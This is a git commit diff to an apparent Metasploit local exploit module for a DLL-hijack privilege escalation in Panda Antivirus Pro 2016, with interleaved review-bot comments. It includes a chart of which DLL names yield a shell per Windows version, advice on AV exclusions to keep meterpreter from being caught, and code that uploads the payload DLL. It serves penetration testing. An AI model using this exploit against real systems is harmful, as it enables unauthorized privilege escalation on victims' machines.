updated dlls and docs

bug/bundler_fix
h00die 2016-10-20 20:45:50 -04:00
parent 3b548dc3cd
commit 12e4fe1c5c
2 changed files with 24 additions and 11 deletions


@ -2,9 +2,12 @@
Panda Antivirus Pro 2016 16.1.2 is available from [filehippo](http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89/) or from an unofficial [git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/Panda_AV_Pro2016_16.1.2.exe). Panda Antivirus Pro 2016 16.1.2 is available from [filehippo](http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89/) or from an unofficial [git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/Panda_AV_Pro2016_16.1.2.exe).
The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour. I put in an exclusion for the AV for the folder to ensure it didn't catch meterpreter in action. The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour. I 32bit meterpreter seems to get caught, so you may need an AV exclusion for the folder to ensure it didn't catch meterpreter in action.
The downloads folder can take a few minutes to appear after install, you may want to wait an hour or so, but it will eventually appear. The downloads folder can take a 10-15 minutes to appear after install, and its downloaded by Panda AV from the company.
1. Theres an HTTP GET request to 23.215.132.154 for /retail/psprofiler/40032/psprofiler_suite.exe
2. Then right after HTTP GET request to 23.215.132.154 for /retail/psevents_suite.exe.
## Verification Steps ## Verification Steps
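Review bot: the rewritten PSEvents sentence has a stray leading "I" ("I 32bit meterpreter seems to get caught"), and the next line reads "can take a 10-15 minutes" and "its downloaded by Panda AV"; suggest "32-bit meterpreter seems to get caught", "can take 10-15 minutes" and "it's downloaded". The two new numbered lines record the download URLs against a bare IP (23.215.132.154); since the text says the folder is fetched from the vendor, noting the hostname from the request alongside the IP would keep the documentation useful if that address changes.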
@ -24,7 +27,17 @@
**DLL** **DLL**
Which DLL to name our payload. The original vulnerability writeup utilized bcryptPrimitives.dll, however I found which dll to be VERY picky. CRYPTBASE.dll seemed to work the best and is the default. Which DLL to name our payload. The original vulnerability writeup utilized bcryptPrimitives.dll, and mentioned several others that could be used. However the dll seems to be VERY picky. Default is cryptnet.dll. See the chart for more details.
| | WINHTTP.dll | VERSION.dll | bcryptPrimitives.dll | CRYPTBASE.dll | cryptnet.dll | WININET.dll |
|---------------------------------------------------------------|-------------|-------------|----------------------|---------------|--------------|-------------|
| 64bit target (1), win10 x64 | CRASH | CRASH | NO | NO | valid | no |
| 64bit target (1), win8.1 x86 | CRASH | CRASH | NO | valid | valid | no |
| 32bit target (0), win10 x64 | CRASH | CRASH | NO | NO | valid | no |
| 32bit target (0), win8.1 x86 | CRASH | CRASH | NO | valid | valid (caught by av) | no |
| 32bit target (0), win7sp1 x86 | | | valid | | valid (caught by av) | |
In this chart, `CRASH` means PSEvents.exe crashed on the system. `NO` means PSEvents didn't crash, but no session was obtained. `valid` means we got a shell.
**ListenerTimeout** **ListenerTimeout**
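Review bot: the legend under the chart defines CRASH, NO and valid, but the win7sp1 x86 row leaves four cells blank and the WININET.dll column uses lowercase "no"; suggest filling the blanks with "not tested" (or a "-" defined in the legend) and using "NO" consistently so a reader can tell untested from failed. A sentence after the chart stating that WINHTTP.dll, VERSION.dll and WININET.dll were dropped from the DLL option because they crash PSEvents.exe or never returned a session would also help, since the chart keeps those columns while the option's accepted list in this same commit no longer offers them.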
@ -73,7 +86,7 @@
Name Current Setting Required Description Name Current Setting Required Description
---- --------------- -------- ----------- ---- --------------- -------- -----------
DLL CRYPTBASE.dll yes dll to create (Accepted: WINHTTP.dll, VERSION.dll, bcryptPrimitives.dll, CRYPTBASE.dll, cryptnet.dll, WININET.dll) DLL CRYPTBASE.dll yes dll to create (Accepted: cryptnet.dll, bcryptPrimitives.dll, CRYPTBASE.dll)
ListenerTimeout 3610 yes Number of seconds to wait for the exploit ListenerTimeout 3610 yes Number of seconds to wait for the exploit
SESSION 1 yes The session to run this module on. SESSION 1 yes The session to run this module on.
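Review bot: the `show options` sample still lists CRYPTBASE.dll as the Current Setting for DLL, while this commit changes the option default to cryptnet.dll and the DLL description above says "Default is cryptnet.dll"; update the sample to `DLL cryptnet.dll yes dll to create (Accepted: cryptnet.dll, bcryptPrimitives.dll, CRYPTBASE.dll)` so the three agree.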


@ -53,8 +53,8 @@ class MetasploitModule < Msf::Exploit::Local
)) ))
register_options( register_options(
[ [
OptEnum.new('DLL', [ true, 'dll to create', 'CRYPTBASE.dll', OptEnum.new('DLL', [ true, 'dll to create', 'cryptnet.dll',
['WINHTTP.dll', 'VERSION.dll', 'bcryptPrimitives.dll', 'CRYPTBASE.dll', 'cryptnet.dll', 'WININET.dll']]), ['cryptnet.dll', 'bcryptPrimitives.dll', 'CRYPTBASE.dll']]),
OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit', 3610]), OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit', 3610]),
], self.class) ], self.class)
end end
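Review bot: narrowing the OptEnum to cryptnet.dll, bcryptPrimitives.dll and CRYPTBASE.dll matches the chart in the docs, but the chart also shows the working DLL depends on the target (CRYPTBASE.dll only gave a session on win8.1 x86, bcryptPrimitives.dll only on win7sp1 x86) and nothing in the module ties the chosen DLL to `sysinfo['OS']`; consider a `print_warning` in `exploit` when the selected DLL has no recorded success for the detected OS, or at least naming the per-OS expectation in the option description instead of just "dll to create".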
@ -62,18 +62,18 @@ class MetasploitModule < Msf::Exploit::Local
def get_path() def get_path()
case sysinfo['OS'] case sysinfo['OS']
when /Windows (7|8|10|2012|2008)/ when /Windows (7|8|10|2012|2008)/
return '%ProgramData%\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\' return '%ProgramData%\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171'
when /Windows (NT|XP)/ when /Windows (NT|XP)/
return '%AllUsersProfile%\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\' return '%AllUsersProfile%\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171'
end end
end end
def check def check
directory if directory?(get_path())
if directory(get_path())
print_good('Vuln path exists') print_good('Vuln path exists')
CheckCode::Appears CheckCode::Appears
else else
vprint_error("#{get_path()} doesn't exist on target")
CheckCode::Safe CheckCode::Safe
end end
end end
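Review bot: `get_path` returns nil when `sysinfo['OS']` matches neither regex, so `check` ends up calling `directory?(nil)` and, on the failure branch, prints " doesn't exist on target" with an empty path. Suggest assigning `path = get_path` once, returning `CheckCode::Unknown` with a message when it is nil, and reusing `path` in both the `directory?` call and the `vprint_error`. The fix from the broken `directory` / `directory(get_path())` pair to `directory?(get_path())` and the dropped trailing backslash look right; minor style point, `def get_path()` and the `get_path()` calls can lose the empty parentheses.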
@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Local
vprint_status("OS Detected as: #{sysinfo['OS']}") vprint_status("OS Detected as: #{sysinfo['OS']}")
payload_filepath = get_path() payload_filepath = get_path()
payload_filepath = "#{payload_filepath}#{datastore['DLL']}" payload_filepath = "#{payload_filepath}\\#{datastore['DLL']}"
upload_payload_dll(payload_filepath) upload_payload_dll(payload_filepath)
# start the hour wait # start the hour wait
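Review bot: with the trailing backslash gone from `get_path`, joining with `"#{payload_filepath}\\#{datastore['DLL']}"` is consistent, but `exploit` has no guard for a nil return: on an unmatched OS string the path becomes `"\\cryptnet.dll"` and `upload_payload_dll` writes the DLL to the root of the current drive instead of failing. Suggest `fail_with(Failure::NoTarget, "Unsupported OS: #{sysinfo['OS']}") if payload_filepath.nil?` right after the `get_path()` assignment, before the DLL name is appended.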